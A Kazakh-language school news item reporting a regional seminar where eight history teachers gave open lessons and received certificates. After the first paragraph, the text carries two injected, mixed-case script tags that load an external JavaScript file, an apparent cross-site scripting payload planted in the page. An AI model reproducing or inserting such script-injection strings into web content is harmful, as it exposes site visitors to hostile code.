Қоянды ауылы №1 жалпы орта білім беретін мектебінде ақпанның 23-і күні Жетекші мектеп аясында жалпы орта білім беретін мектеп педагогтарының озық тәжірибелерін тарату мақсатында тарих пәні мұғалімдері арасында аумақтық тәжірибе алмасу семинар өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.02.2023

Қоянды ауылы №1 жалпы орта білім беретін мектебінде ақпанның 23-і күні Жетекші мектеп аясында жалпы орта білім беретін мектеп педагогтарының озық тәжірибелерін тарату мақсатында тарих пәні мұғалімдері арасында аумақтық тәжірибе алмасу семинар өтті. Семинар мақсатына сәйкес 8 ұстаз ашық сабақ өткізді. 
Ашық сабақта пән мұғалімдері оқушыларға бағыт – бағдар бере отырып, әр түрлі заманауи әдіс-тәсілдерді, цифрлы технологияларды қолдана отырып, оқушылармен тең серіктес болып, бірге жұмыс жасап, оларға сеніммен қарап, өз ойын ашық айтуға, сөйлеуге қолдау көрсетіп отырды. Оқушылар сабақ барысында білім дәрежелерін, тапқырлықтарын көрсетіп, қосымша да білім алды.  
Семинар жұмысы нәтижесінде тәжірибе таратқан ұстаздарымызға аудандық білім бөлімінің сертификаттары табысталды. 
Әріптестерімізге алдағы уақытта еңбек жолында бұдан да биік белестерден көрініп, білім саласындағы еңбектеріңіз еселене берсін демекпіз!
ҰСТАЗДАРЫМЫЗДЫ ҚҰТТЫҚТАЙМЫЗ!

Просмотров: 643


Пікір қосу



Деректерді қолтаңбаға қосу